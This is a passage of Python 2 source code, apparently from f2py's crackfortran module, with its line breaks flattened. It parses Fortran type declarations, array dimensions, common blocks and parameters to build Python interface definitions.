"%s" ("%s") to "%s". Ignoring.\n' % (ename,edecl['='],d1['init'])) else: edecl['=']=d1['init'] else: outmess('updatevars: could not crack entity declaration "%s". Ignoring.\n'%(ename+m.group('after'))) for k in edecl.keys(): if not edecl[k]: del edecl[k] groupcache[groupcounter]['vars'][ename]=edecl if 'varnames' in groupcache[groupcounter]: groupcache[groupcounter]['varnames'].append(ename) last_name = ename return last_name def cracktypespec(typespec,selector): kindselect=None charselect=None typename=None if selector: if typespec in ['complex','integer','logical','real']: kindselect=kindselector.match(selector) if not kindselect: outmess('cracktypespec: no kindselector pattern found for %s\n'%(`selector`)) return kindselect=kindselect.groupdict() kindselect['*']=kindselect['kind2'] del kindselect['kind2'] for k in kindselect.keys(): if not kindselect[k]: del kindselect[k] for k,i in kindselect.items(): kindselect[k] = rmbadname1(i) elif typespec=='character': charselect=charselector.match(selector) if not charselect: outmess('cracktypespec: no charselector pattern found for %s\n'%(`selector`)) return charselect=charselect.groupdict() charselect['*']=charselect['charlen'] del charselect['charlen'] if charselect['lenkind']: lenkind=lenkindpattern.match(markoutercomma(charselect['lenkind'])) lenkind=lenkind.groupdict() for lk in ['len','kind']: if lenkind[lk+'2']: lenkind[lk]=lenkind[lk+'2'] charselect[lk]=lenkind[lk] del lenkind[lk+'2'] del charselect['lenkind'] for k in charselect.keys(): if not charselect[k]: del charselect[k] for k,i in charselect.items(): charselect[k] = rmbadname1(i) elif typespec=='type': typename=re.match(r'\s*\(\s*(?P<name>\w+)\s*\)',selector,re.I) if typename: typename=typename.group('name') else: outmess('cracktypespec: no typename found in %s\n'%(`typespec+selector`)) else: outmess('cracktypespec: no selector used for %s\n'%(`selector`)) return kindselect,charselect,typename ###### def setattrspec(decl,attr,force=0): if not decl: decl={} if not attr: return decl if 'attrspec' not in decl: decl['attrspec']=[attr] return decl if force: decl['attrspec'].append(attr) if attr in decl['attrspec']: return decl if attr=='static' and 'automatic' not in decl['attrspec']: decl['attrspec'].append(attr) elif attr=='automatic' and 'static' not in decl['attrspec']: decl['attrspec'].append(attr) elif attr=='public' and 'private' not in decl['attrspec']: decl['attrspec'].append(attr) elif attr=='private' and 'public' not in decl['attrspec']: decl['attrspec'].append(attr) else: decl['attrspec'].append(attr) return decl def setkindselector(decl,sel,force=0): if not decl: decl={} if not sel: return decl if 'kindselector' not in decl: decl['kindselector']=sel return decl for k in sel.keys(): if force or k not in decl['kindselector']: decl['kindselector'][k]=sel[k] return decl def setcharselector(decl,sel,force=0): if not decl: decl={} if not sel: return decl if 'charselector' not in decl: decl['charselector']=sel return decl for k in sel.keys(): if force or k not in decl['charselector']: decl['charselector'][k]=sel[k] return decl def getblockname(block,unknown='unknown'): if 'name' in block: return block['name'] return unknown ###### post processing def setmesstext(block): global filepositiontext try: filepositiontext='In: %s:%s\n'%(block['from'],block['name']) except: pass def get_usedict(block): usedict = {} if 'parent_block' in block: usedict = get_usedict(block['parent_block']) if 'use' in block: usedict.update(block['use']) return usedict def get_useparameters(block, param_map=None): global f90modulevars if param_map is None: param_map = {} usedict = get_usedict(block) if not usedict: return param_map for usename,mapping in usedict.items(): usename = usename.lower() if usename not in f90modulevars: outmess('get_useparameters: no module %s info used by %s\n' % (usename, block.get('name'))) continue mvars = f90modulevars[usename] params = get_parameters(mvars) if not params: continue # XXX: apply mapping if mapping: errmess('get_useparameters: mapping for %s not impl.' % (mapping)) for k,v in params.items(): if k in param_map: outmess('get_useparameters: overriding parameter %s with'\ ' value from module %s' % (`k`,`usename`)) param_map[k] = v return param_map def postcrack2(block,tab='',param_map=None): global f90modulevars if not f90modulevars: return block if type(block)==types.ListType: ret = [] for g in block: g = postcrack2(g,tab=tab+'\t',param_map=param_map) ret.append(g) return ret setmesstext(block) outmess('%sBlock: %s\n'%(tab,block['name']),0) if param_map is None: param_map = get_useparameters(block) if param_map is not None and 'vars' in block: vars = block['vars'] for n in vars.keys(): var = vars[n] if 'kindselector' in var: kind = var['kindselector'] if 'kind' in kind: val = kind['kind'] if val in param_map: kind['kind'] = param_map[val] new_body = [] for b in block['body']: b = postcrack2(b,tab=tab+'\t',param_map=param_map) new_body.append(b) block['body'] = new_body return block def postcrack(block,args=None,tab=''): """ TODO: function return values determine expression types if in argument list """ global usermodules,onlyfunctions if type(block)==types.ListType: gret=[] uret=[] for g in block: setmesstext(g) g=postcrack(g,tab=tab+'\t') if 'name' in g and '__user__' in g['name']: # sort user routines to appear first uret.append(g) else: gret.append(g) return uret+gret setmesstext(block) if (not type(block)==types.DictType) and 'block' not in block: raise Exception('postcrack: Expected block dictionary instead of ' + \ str(block)) if 'name' in block and not block['name']=='unknown_interface': outmess('%sBlock: %s\n'%(tab,block['name']),0) blocktype=block['block'] block=analyzeargs(block) block=analyzecommon(block) block['vars']=analyzevars(block) block['sortvars']=sortvarnames(block['vars']) if 'args' in block and block['args']: args=block['args'] block['body']=analyzebody(block,args,tab=tab) userisdefined=[] ## fromuser = [] if 'use' in block: useblock=block['use'] for k in useblock.keys(): if '__user__' in k: userisdefined.append(k) ## if 'map' in useblock[k]: ## for n in useblock[k]['map'].values(): ## if n not in fromuser: fromuser.append(n) else: useblock={} name='' if 'name' in block: name=block['name'] if 'externals' in block and block['externals']:# and not userisdefined: # Build a __user__ module interfaced=[] if 'interfaced' in block: interfaced=block['interfaced'] mvars=copy.copy(block['vars']) if name: mname=name+'__user__routines' else: mname='unknown__user__routines' if mname in userisdefined: i=1 while '%s_%i'%(mname,i) in userisdefined: i=i+1 mname='%s_%i'%(mname,i) interface={'block':'interface','body':[],'vars':{},'name':name+'_user_interface'} for e in block['externals']: ## if e in fromuser: ## outmess(' Skipping %s that is defined explicitly in another use statement\n'%(`e`)) ## continue if e in interfaced: edef=[] j=-1 for b in block['body']: j=j+1 if b['block']=='interface': i=-1 for bb in b['body']: i=i+1 if 'name' in bb and bb['name']==e: edef=copy.copy(bb) del b['body'][i] break if edef: if not b['body']: del block['body'][j] del interfaced[interfaced.index(e)] break interface['body'].append(edef) else: if e in mvars and not isexternal(mvars[e]): interface['vars'][e]=mvars[e] if interface['vars'] or interface['body']: block['interfaced']=interfaced mblock={'block':'python module','body':[interface],'vars':{},'name':mname,'interfaced':block['externals']} useblock[mname]={} usermodules.append(mblock) if useblock: block['use']=useblock return block def sortvarnames(vars): indep = [] dep = [] for v in vars.keys(): if 'depend' in vars[v] and vars[v]['depend']: dep.append(v) #print '%s depends on %s'%(v,vars[v]['depend']) else: indep.append(v) n = len(dep) i = 0 while dep: #XXX: How to catch dependence cycles correctly? v = dep[0] fl = 0 for w in dep[1:]: if w in vars[v]['depend']: fl = 1 break if fl: dep = dep[1:]+[v] i = i + 1 if i>n: errmess('sortvarnames: failed to compute dependencies because' ' of cyclic dependencies between ' +', '.join(dep)+'\n') indep = indep + dep break else: indep.append(v) dep = dep[1:] n = len(dep) i = 0 #print indep return indep def analyzecommon(block): if not hascommon(block): return block commonvars=[] for k in block['common'].keys(): comvars=[] for e in block['common'][k]: m=re.match(r'\A\s*\b(?P<name>.*?)\b\s*(\((?P<dims>.*?)\)|)\s*\Z',e,re.I) if m: dims=[] if m.group('dims'): dims=[x.strip() for x in markoutercomma(m.group('dims')).split('@,@')] n=m.group('name').strip() if n in block['vars']: if 'attrspec' in block['vars'][n]: block['vars'][n]['attrspec'].append('dimension(%s)'%(','.join(dims))) else: block['vars'][n]['attrspec']=['dimension(%s)'%(','.join(dims))] else: if dims: block['vars'][n]={'attrspec':['dimension(%s)'%(','.join(dims))]} else: block['vars'][n]={} if n not in commonvars: commonvars.append(n) else: n=e errmess('analyzecommon: failed to extract "<name>[(<dims>)]" from "%s" in common /%s/.\n'%(e,k)) comvars.append(n) block['common'][k]=comvars if 'commonvars' not in block: block['commonvars']=commonvars else: block['commonvars']=block['commonvars']+commonvars return block def analyzebody(block,args,tab=''): global usermodules,skipfuncs,onlyfuncs,f90modulevars setmesstext(block) body=[] for b in block['body']: b['parent_block'] = block if b['block'] in ['function','subroutine']: if args is not None and b['name'] not in args: continue else: as_=b['args'] if b['name'] in skipfuncs: continue if onlyfuncs and b['name'] not in onlyfuncs: continue b['saved_interface'] = crack2fortrangen(b, '\n'+' '*6, as_interface=True) else: as_=args b=postcrack(b,as_,tab=tab+'\t') if b['block']=='interface' and not b['body']: if 'f2pyenhancements' not in b: continue if b['block'].replace(' ','')=='pythonmodule': usermodules.append(b) else: if b['block']=='module': f90modulevars[b['name']] = b['vars'] body.append(b) return body def buildimplicitrules(block): setmesstext(block) implicitrules=defaultimplicitrules attrrules={} if 'implicit' in block: if block['implicit'] is None: implicitrules=None if verbose>1: outmess('buildimplicitrules: no implicit rules for routine %s.\n'%`block['name']`) else: for k in block['implicit'].keys(): if block['implicit'][k].get('typespec') not in ['static','automatic']: implicitrules[k]=block['implicit'][k] else: attrrules[k]=block['implicit'][k]['typespec'] return implicitrules,attrrules def myeval(e,g=None,l=None): r = eval(e,g,l) if type(r) in [type(0),type(0.0)]: return r raise ValueError('r=%r' % (r)) getlincoef_re_1 = re.compile(r'\A\b\w+\b\Z',re.I) def getlincoef(e,xset): # e = a*x+b ; x in xset try: c = int(myeval(e,{},{})) return 0,c,None except: pass if getlincoef_re_1.match(e): return 1,0,e len_e = len(e) for x in xset: if len(x)>len_e: continue if re.search(r'\w\s*\([^)]*\b'+x+r'\b', e): # skip function calls having x as an argument, e.g max(1, x) continue re_1 = re.compile(r'(?P<before>.*?)\b'+x+r'\b(?P<after>.*)',re.I) m = re_1.match(e) if m: try: m1 = re_1.match(e) while m1: ee = '%s(%s)%s'%(m1.group('before'),0,m1.group('after')) m1 = re_1.match(ee) b = myeval(ee,{},{}) m1 = re_1.match(e) while m1: ee = '%s(%s)%s'%(m1.group('before'),1,m1.group('after')) m1 = re_1.match(ee) a = myeval(ee,{},{}) - b m1 = re_1.match(e) while m1: ee = '%s(%s)%s'%(m1.group('before'),0.5,m1.group('after')) m1 = re_1.match(ee) c = myeval(ee,{},{}) # computing another point to be sure that expression is linear m1 = re_1.match(e) while m1: ee = '%s(%s)%s'%(m1.group('before'),1.5,m1.group('after')) m1 = re_1.match(ee) c2 = myeval(ee,{},{}) if (a*0.5+b==c and a*1.5+b==c2): return a,b,x except: pass break return None,None,None _varname_match = re.compile(r'\A[a-z]\w*\Z').match def getarrlen(dl,args,star='*'): edl = [] try: edl.append(myeval(dl[0],{},{})) except: edl.append(dl[0]) try: edl.append(myeval(dl[1],{},{})) except: edl.append(dl[1]) if type(edl[0]) is type(0): p1 = 1-edl[0] if p1==0: d = str(dl[1]) elif p1<0: d = '%s-%s'%(dl[1],-p1) else: d = '%s+%s'%(dl[1],p1) elif type(edl[1]) is type(0): p1 = 1+edl[1] if p1==0: d='-(%s)' % (dl[0]) else: d='%s-(%s)' % (p1,dl[0]) else: d = '%s-(%s)+1'%(dl[1],dl[0]) try: return `myeval(d,{},{})`,None,None except: pass d1,d2=getlincoef(dl[0],args),getlincoef(dl[1],args) if None not in [d1[0],d2[0]]: if (d1[0],d2[0])==(0,0): return `d2[1]-d1[1]+1`,None,None b = d2[1] - d1[1] + 1 d1 = (d1[0],0,d1[2]) d2 = (d2[0],b,d2[2]) if d1[0]==0 and d2[2] in args: if b<0: return '%s * %s - %s'%(d2[0],d2[2],-b),d2[2],'+%s)/(%s)'%(-b,d2[0]) elif b: return '%s * %s + %s'%(d2[0],d2[2],b),d2[2],'-%s)/(%s)'%(b,d2[0]) else: return '%s * %s'%(d2[0],d2[2]),d2[2],')/(%s)'%(d2[0]) if d2[0]==0 and d1[2] in args: if b<0: return '%s * %s - %s'%(-d1[0],d1[2],-b),d1[2],'+%s)/(%s)'%(-b,-d1[0]) elif b: return '%s * %s + %s'%(-d1[0],d1[2],b),d1[2],'-%s)/(%s)'%(b,-d1[0]) else: return '%s * %s'%(-d1[0],d1[2]),d1[2],')/(%s)'%(-d1[0]) if d1[2]==d2[2] and d1[2] in args: a = d2[0] - d1[0] if not a: return `b`,None,None if b<0: return '%s * %s - %s'%(a,d1[2],-b),d2[2],'+%s)/(%s)'%(-b,a) elif b: return '%s * %s + %s'%(a,d1[2],b),d2[2],'-%s)/(%s)'%(b,a) else: return '%s * %s'%(a,d1[2]),d2[2],')/(%s)'%(a) if d1[0]==d2[0]==1: c = str(d1[2]) if c not in args: if _varname_match(c): outmess('\tgetarrlen:variable "%s" undefined\n' % (c)) c = '(%s)'%c if b==0: d='%s-%s' % (d2[2],c) elif b<0: d='%s-%s-%s' % (d2[2],c,-b) else: d='%s-%s+%s' % (d2[2],c,b) elif d1[0]==0: c2 = str(d2[2]) if c2 not in args: if _varname_match(c2): outmess('\tgetarrlen:variable "%s" undefined\n' % (c2)) c2 = '(%s)'%c2 if d2[0]==1: pass elif d2[0]==-1: c2='-%s' %c2 else: c2='%s*%s'%(d2[0],c2) if b==0: d=c2 elif b<0: d='%s-%s' % (c2,-b) else: d='%s+%s' % (c2,b) elif d2[0]==0: c1 = str(d1[2]) if c1 not in args: if _varname_match(c1): outmess('\tgetarrlen:variable "%s" undefined\n' % (c1)) c1 = '(%s)'%c1 if d1[0]==1: c1='-%s'%c1 elif d1[0]==-1: c1='+%s'%c1 elif d1[0]<0: c1='+%s*%s'%(-d1[0],c1) else: c1 = '-%s*%s' % (d1[0],c1) if b==0: d=c1 elif b<0: d='%s-%s' % (c1,-b) else: d='%s+%s' % (c1,b) else: c1 = str(d1[2]) if c1 not in args: if _varname_match(c1): outmess('\tgetarrlen:variable "%s" undefined\n' % (c1)) c1 = '(%s)'%c1 if d1[0]==1: c1='-%s'%c1 elif d1[0]==-1: c1='+%s'%c1 elif d1[0]<0: c1='+%s*%s'%(-d1[0],c1) else: c1 = '-%s*%s' % (d1[0],c1) c2 = str(d2[2]) if c2 not in args: if _varname_match(c2): outmess('\tgetarrlen:variable "%s" undefined\n' % (c2)) c2 = '(%s)'%c2 if d2[0]==1: pass elif d2[0]==-1: c2='-%s' %c2 else: c2='%s*%s'%(d2[0],c2) if b==0: d='%s%s' % (c2,c1) elif b<0: d='%s%s-%s' % (c2,c1,-b) else: d='%s%s+%s' % (c2,c1,b) return d,None,None word_pattern = re.compile(r'\b[a-z][\w$]*\b',re.I) def _get_depend_dict(name, vars, deps): if name in vars: words = vars[name].get('depend',[]) if '=' in vars[name] and not isstring(vars[name]): for word in word_pattern.findall(vars[name]['=']): if word not in words and word in vars: words.append(word) for word in words[:]: for w in deps.get(word,[]) \ or _get_depend_dict(word, vars, deps): if w not in words: words.append(w) else: outmess('_get_depend_dict: no dependence info for %s\n' % (`name`)) words = [] deps[name] = words return words def _calc_depend_dict(vars): names = vars.keys() depend_dict = {} for n in names: _get_depend_dict(n, vars, depend_dict) return depend_dict def get_sorted_names(vars): """ """ depend_dict = _calc_depend_dict(vars) names = [] for name in depend_dict.keys(): if not depend_dict[name]: names.append(name) del depend_dict[name] while depend_dict: for name, lst in depend_dict.items(): new_lst = [n for n in lst if n in depend_dict] if not new_lst: names.append(name) del depend_dict[name] else: depend_dict[name] = new_lst return [name for name in names if name in vars] def _kind_func(string): #XXX: return something sensible. if string[0] in "'\"": string = string[1:-1] if real16pattern.match(string): return 8 elif real8pattern.match(string): return 4 return 'kind('+string+')' def _selected_int_kind_func(r): #XXX: This should be processor dependent m = 10**r if m<=2**8: return 1 if m<=2**16: return 2 if m<=2**32: return 4 if m<=2**63: return 8 if m<=2**128: return 16 return -1 def _selected_real_kind_func(p, r=0, radix=0): #XXX: This should be processor dependent # This is only good for 0 <= p <= 20 if p < 7: return 4 if p < 16: return 8 if platform.machine().lower().startswith('power'): if p <= 20: return 16 else: if p < 19: return 10 elif p <= 20: return 16 return -1 def get_parameters(vars, global_params={}): params = copy.copy(global_params) g_params = copy.copy(global_params) for name,func in [('kind',_kind_func), ('selected_int_kind',_selected_int_kind_func), ('selected_real_kind',_selected_real_kind_func), ]: if name not in g_params: g_params[name] = func param_names = [] for n in get_sorted_names(vars): if 'attrspec' in vars[n] and 'parameter' in vars[n]['attrspec']: param_names.append(n) kind_re = re.compile(r'\bkind\s*\(\s*(?P<value>.*)\s*\)',re.I) selected_int_kind_re = re.compile(r'\bselected_int_kind\s*\(\s*(?P<value>.*)\s*\)',re.I) selected_kind_re = re.compile(r'\bselected_(int|real)_kind\s*\(\s*(?P<value>.*)\s*\)',re.I) for n in param_names: if '=' in vars[n]: v = vars[n]['='] if islogical(vars[n]): v = v.lower() for repl in [ ('.false.','False'), ('.true.','True'), #TODO: test .eq., .neq., etc replacements. ]: v = v.replace(*repl) v = kind_re.sub(r'kind("\1")',v) v = selected_int_kind_re.sub(r'selected_int_kind(\1)',v) if isinteger(vars[n]) and not selected_kind_re.match(v): v = v.split('_')[0] if isdouble(vars[n]): tt = list(v) for m in real16pattern.finditer(v): tt[m.start():m.end()] = list(\ v[m.start():m.end()].lower().replace('d', 'e')) v = ''.join(tt) if iscomplex(vars[n]): if v[0]=='(' and v[-1]==')': l = markoutercomma(v[1:-1]).split('@,@') try: params[n] = eval(v,g_params,params) except Exception,msg: params[n] = v #print params outmess('get_parameters: got "%s" on %s\n' % (msg,`v`)) if isstring(vars[n]) and type(params[n]) is type(0): params[n] = chr(params[n]) nl = n.lower() if nl!=n: params[nl] = params[n] else: print vars[n] outmess('get_parameters:parameter %s does not have value?!\n'%(`n`)) return params def _eval_length(length,params): if length in ['(:)','(*)','*']: return '(*)' return _eval_scalar(length,params) _is_kind_number = re.compile(r'\d+_').match def _eval_scalar(value,params): if _is_kind_number(value): value = value.split('_')[0] try: value = str(eval(value,{},params)) except (NameError, SyntaxError): return value except Exception,msg: errmess('"%s" in evaluating %r '\ '(available names: %s)\n' \ % (msg,value,params.keys())) return value def analyzevars(block): global f90modulevars setmesstext(block) implicitrules,attrrules=buildimplicitrules(block) vars=copy.copy(block['vars']) if block['block']=='function' and block['name'] not in vars: vars[block['name']]={} if '' in block['vars']: del vars[''] if 'attrspec' in block['vars']['']: gen=block['vars']['']['attrspec'] for n in vars.keys(): for k in ['public','private']: if k in gen: vars[n]=setattrspec(vars[n],k) svars=[] args = block['args'] for a in args: try: vars[a] svars.append(a) except KeyError: pass for n in vars.keys(): if n not in args: svars.append(n) params = get_parameters(vars, get_useparameters(block)) dep_matches = {} name_match = re.compile(r'\w[\w\d_$]*').match for v in vars.keys(): m = name_match(v) if m: n = v[m.start():m.end()] try: dep_matches[n] except KeyError: dep_matches[n] = re.compile(r'.*\b%s\b'%(v),re.I).match for n in svars: if n[0] in attrrules.keys(): vars[n]=setattrspec(vars[n],attrrules[n[0]]) if 'typespec' not in vars[n]: if not('attrspec' in vars[n] and 'external' in vars[n]['attrspec']): if implicitrules: ln0 = n[0].lower() for k in implicitrules[ln0].keys(): if k=='typespec' and implicitrules[ln0][k]=='undefined': continue if k not in vars[n]: vars[n][k]=implicitrules[ln0][k] elif k=='attrspec': for l in implicitrules[ln0][k]: vars[n]=setattrspec(vars[n],l) elif n in block['args']: outmess('analyzevars: typespec of variable %s is not defined in routine %s.\n'%(`n`,block['name'])) if 'charselector' in vars[n]: if 'len' in vars[n]['charselector']: l = vars[n]['charselector']['len'] try: l = str(eval(l,{},params)) except: pass vars[n]['charselector']['len'] = l if 'kindselector' in vars[n]: if 'kind' in vars[n]['kindselector']: l = vars[n]['kindselector']['kind'] try: l = str(eval(l,{},params)) except: pass vars[n]['kindselector']['kind'] = l savelindims = {} if 'attrspec' in vars[n]: attr=vars[n]['attrspec'] attr.reverse() vars[n]['attrspec']=[] dim,intent,depend,check,note=None,None,None,None,None for a in attr: if a[:9]=='dimension': dim=(a[9:].strip())[1:-1] elif a[:6]=='intent': intent=(a[6:].strip())[1:-1] elif a[:6]=='depend': depend=(a[6:].strip())[1:-1] elif a[:5]=='check': check=(a[5:].strip())[1:-1] elif a[:4]=='note': note=(a[4:].strip())[1:-1] else: vars[n]=setattrspec(vars[n],a) if intent: if 'intent' not in vars[n]: vars[n]['intent']=[] for c in [x.strip() for x in markoutercomma(intent).split('@,@')]: if not c in vars[n]['intent']: vars[n]['intent'].append(c) intent=None if note: note=note.replace('\\n\\n','\n\n') note=note.replace('\\n ','\n') if 'note' not in vars[n]: vars[n]['note']=[note] else: vars[n]['note'].append(note) note=None if depend is not None: if 'depend' not in vars[n]: vars[n]['depend']=[] for c in rmbadname([x.strip() for x in markoutercomma(depend).split('@,@')]): if c not in vars[n]['depend']: vars[n]['depend'].append(c) depend=None if check is not None: if 'check' not in vars[n]: vars[n]['check']=[] for c in [x.strip() for x in markoutercomma(check).split('@,@')]: if not c in vars[n]['check']: vars[n]['check'].append(c) check=None if dim and 'dimension' not in vars[n]: vars[n]['dimension']=[] for d in rmbadname([x.strip() for x in markoutercomma(dim).split('@,@')]): star = '*' if d==':': star=':' if d in params: d = str(params[d]) for p in params.keys(): m = re.match(r'(?P<before>.*?)\b'+p+r'\b(?P<after>.*)',d,re.I) if m: #outmess('analyzevars:replacing parameter %s in %s (dimension of %s) with %s\n'%(`p`,`d`,`n`,`params[p]`)) d = m.group('before')+str(params[p])+m.group('after') if d==star: dl = [star] else: dl=markoutercomma(d,':').split('@:@') if len(dl)==2 and '*' in dl: # e.g. dimension(5:*) dl = ['*'] d = '*' if len(dl)==1 and not dl[0]==star: dl = ['1',dl[0]] if len(dl)==2: d,v,di = getarrlen(dl,block['vars'].keys()) if d[:4] == '1 * ': d = d[4:] if di and di[-4:] == '/(1)': di = di[:-4] if v: savelindims[d] = v,di vars[n]['dimension'].append(d) if 'dimension' in vars[n]: if isintent_c(vars[n]): shape_macro = 'shape' else: shape_macro = 'shape'#'fshape' if isstringarray(vars[n]): if 'charselector' in vars[n]: d = vars[n]['charselector'] if '*' in d: d = d['*'] errmess('analyzevars: character array "character*%s %s(%s)" is considered as "character %s(%s)"; "intent(c)" is forced.\n'\ %(d,n, ','.join(vars[n]['dimension']), n,','.join(vars[n]['dimension']+[d]))) vars[n]['dimension'].append(d) del vars[n]['charselector'] if 'intent' not in vars[n]: vars[n]['intent'] = [] if 'c' not in vars[n]['intent']: vars[n]['intent'].append('c') else: errmess("analyzevars: charselector=%r unhandled." % (d)) if 'check' not in vars[n] and 'args' in block and n in block['args']: flag = 'depend' not in vars[n] if flag: vars[n]['depend']=[] vars[n]['check']=[] if 'dimension' in vars[n]: #/----< no check #vars[n]['check'].append('rank(%s)==%s'%(n,len(vars[n]['dimension']))) i=-1; ni=len(vars[n]['dimension']) for d in vars[n]['dimension']: ddeps=[] # dependecies of 'd' ad='' pd='' #origd = d if d not in vars: if d in savelindims: pd,ad='(',savelindims[d][1] d = savelindims[d][0] else: for r in block['args']: #for r in block['vars'].keys(): if r not in vars: continue if re.match(r'.*?\b'+r+r'\b',d,re.I): ddeps.append(r) if d in vars: if 'attrspec' in vars[d]: for aa in vars[d]['attrspec']: if aa[:6]=='depend': ddeps += aa[6:].strip()[1:-1].split(',') if 'depend' in vars[d]: ddeps=ddeps+vars[d]['depend'] i=i+1 if d in vars and ('depend' not in vars[d]) \ and ('=' not in vars[d]) and (d not in vars[n]['depend']) \ and l_or(isintent_in, isintent_inout, isintent_inplace)(vars[n]): vars[d]['depend']=[n] if ni>1: vars[d]['=']='%s%s(%s,%s)%s'% (pd,shape_macro,n,i,ad) else: vars[d]['=']='%slen(%s)%s'% (pd,n,ad) # /---< no check if 1 and 'check' not in vars[d]: if ni>1: vars[d]['check']=['%s%s(%s,%i)%s==%s'\ %(pd,shape_macro,n,i,ad,d)] else: vars[d]['check']=['%slen(%s)%s>=%s'%(pd,n,ad,d)] if 'attrspec' not in vars[d]: vars[d]['attrspec']=['optional'] if ('optional' not in vars[d]['attrspec']) and\ ('required' not in vars[d]['attrspec']): vars[d]['attrspec'].append('optional') elif d not in ['*',':']: #/----< no check #if ni>1: vars[n]['check'].append('shape(%s,%i)==%s'%(n,i,d)) #else: vars[n]['check'].append('len(%s)>=%s'%(n,d)) if flag: if d in vars: if n not in ddeps: vars[n]['depend'].append(d) else: vars[n]['depend'] = vars[n]['depend'] + ddeps elif isstring(vars[n]): length='1' if 'charselector' in vars[n]: if '*' in vars[n]['charselector']: length = _eval_length(vars[n]['charselector']['*'], params) vars[n]['charselector']['*']=length elif 'len' in vars[n]['charselector']: length = _eval_length(vars[n]['charselector']['len'], params) del vars[n]['charselector']['len'] vars[n]['charselector']['*']=length if not vars[n]['check']: del vars[n]['check'] if flag and not vars[n]['depend']: del vars[n]['depend'] if '=' in vars[n]: if 'attrspec' not in vars[n]: vars[n]['attrspec']=[] if ('optional' not in vars[n]['attrspec']) and \ ('required' not in vars[n]['attrspec']): vars[n]['attrspec'].append('optional') if 'depend' not in vars[n]: vars[n]['depend']=[] for v,m in dep_matches.items(): if m(vars[n]['=']): vars[n]['depend'].append(v) if not vars[n]['depend']: del vars[n]['depend'] if isscalar(vars[n]): vars[n]['='] = _eval_scalar(vars[n]['='],params) for n in vars.keys(): if n==block['name']: # n is block name if 'note' in vars[n]: block['note']=vars[n]['note'] if block['block']=='function': if 'result' in block and block['result'] in vars: vars[n]=appenddecl(vars[n],vars[block['result']]) if 'prefix' in block: pr=block['prefix']; ispure=0; isrec=1 pr1=pr.replace('pure','') ispure=(not pr==pr1) pr=pr1.replace('recursive','') isrec=(not pr==pr1) m=typespattern[0].match(pr) if m: typespec,selector,attr,edecl=cracktypespec0(m.group('this'),m.group('after')) kindselect,charselect,typename=cracktypespec(typespec,selector) vars[n]['typespec']=typespec if kindselect: if 'kind' in kindselect: try: kindselect['kind'] = eval(kindselect['kind'],{},params) except: pass vars[n]['kindselector']=kindselect if charselect: vars[n]['charselector']=charselect if typename: vars[n]['typename']=typename if ispure: vars[n]=setattrspec(vars[n],'pure') if isrec: vars[n]=setattrspec(vars[n],'recursive') else: outmess('analyzevars: prefix (%s) were not used\n'%`block['prefix']`) if not block['block'] in ['module','pythonmodule','python module','block data']: if 'commonvars' in block: neededvars=copy.copy(block['args']+block['commonvars']) else: neededvars=copy.copy(block['args']) for n in vars.keys(): if l_or(isintent_callback,isintent_aux)(vars[n]): neededvars.append(n) if 'entry' in block: neededvars.extend(block['entry'].keys()) for k in block['entry'].keys(): for n in block['entry'][k]: if n not in neededvars: neededvars.append(n) if block['block']=='function': if 'result' in block: neededvars.append(block['result']) else: neededvars.append(block['name']) if block['block'] in ['subroutine','function']: name = block['name'] if name in vars and 'intent' in vars[name]: block['intent'] = vars[name]['intent'] if block['block'] == 'type': neededvars.extend(vars.keys()) for n in vars.keys(): if n not in neededvars: del vars[n] return vars analyzeargs_re_1 = re.compile(r'\A[a-z]+[\w$]*\Z',re.I) def expr2name(a, block, args=[]): orig_a = a a_is_expr = not analyzeargs_re_1.match(a) if a_is_expr: # `a` is an expression implicitrules,attrrules=buildimplicitrules(block) at=determineexprtype(a,block['vars'],implicitrules) na='e_' for c in a: c = c.lower() if c not in string.lowercase+string.digits: c='_' na=na+c if na[-1]=='_': na=na+'e' else: na=na+'_e' a=na while a in block['vars'] or a in block['args']: a=a+'r' if a in args: k = 1 while a + str(k) in args: k = k + 1 a = a + str(k) if a_is_expr: block['vars'][a]=at else: if a not in block['vars']: if orig_a in block['vars']: block['vars'][a] = block['vars'][orig_a] else: block['vars'][a]={} if 'externals' in block and orig_a in block['externals']+block['interfaced']: block['vars'][a]=setattrspec(block['vars'][a],'external') return a def analyzeargs(block): setmesstext(block) implicitrules,attrrules=buildimplicitrules(block) if 'args' not in block: block['args']=[] args=[] for a in block['args']: a = expr2name(a, block, args) args.append(a) block['args']=args if 'entry' in block: for k,args1 in block['entry'].items(): for a in args1: if a not in block['vars']: block['vars'][a]={} for b in block['body']: if b['name'] in args: if 'externals' not in block: block['externals']=[] if b['name'] not in block['externals']: block['externals'].append(b['name']) if 'result' in block and block['result'] not in block['vars']: block['vars'][block['result']]={} return block determineexprtype_re_1 = re.compile(r'\A\(.+?[,].+?\)\Z',re.I) determineexprtype_re_2 = re.compile(r'\A[+-]?\d+(_(P<name>[\w]+)|)\Z',re.I) determineexprtype_re_3 = re.compile(r'\A[+-]?[\d.]+[\d+-de.]*(_(P<name>[\w]+)|)\Z',re.I) determineexprtype_re_4 = re.compile(r'\A\(.*\)\Z',re.I) determineexprtype_re_5 = re.compile(r'\A(?P<name>\w+)\s*\(.*?\)\s*\Z',re.I) def _ensure_exprdict(r): if type(r) is type(0): return {'typespec':'integer'} if type(r) is type(0.0): return {'typespec':'real'} if type(r) is type(0j): return {'typespec':'complex'} assert type(r) is type({}),`r` return r def determineexprtype(expr,vars,rules={}): if expr in vars: return _ensure_exprdict(vars[expr]) expr=expr.strip() if determineexprtype_re_1.match(expr): return {'typespec':'complex'} m=determineexprtype_re_2.match(expr) if m: if 'name' in m.groupdict() and m.group('name'): outmess('determineexprtype: selected kind types not supported (%s)\n'%`expr`) return {'typespec':'integer'} m = determineexprtype_re_3.match(expr) if m: if 'name' in m.groupdict() and m.group('name'): outmess('determineexprtype: selected kind types not supported (%s)\n'%`expr`) return {'typespec':'real'} for op in ['+','-','*','/']: for e in [x.strip() for x in markoutercomma(expr,comma=op).split('@'+op+'@')]: if e in vars: return _ensure_exprdict(vars[e]) t={} if determineexprtype_re_4.match(expr): # in parenthesis t=determineexprtype(expr[1:-1],vars,rules) else: m = determineexprtype_re_5.match(expr) if m: rn=m.group('name') t=determineexprtype(m.group('name'),vars,rules) if t and 'attrspec' in t: del t['attrspec'] if not t: if rn[0] in rules: return _ensure_exprdict(rules[rn[0]]) if expr[0] in '\'"': return {'typespec':'character','charselector':{'*':'*'}} if not t: outmess('determineexprtype: could not determine expressions (%s) type.\n'%(`expr`)) return t ###### def crack2fortrangen(block,tab='\n', as_interface=False): global skipfuncs, onlyfuncs setmesstext(block) ret='' if isinstance(block, list): for g in block: if g and g['block'] in ['function','subroutine']: if g['name'] in skipfuncs: continue if onlyfuncs 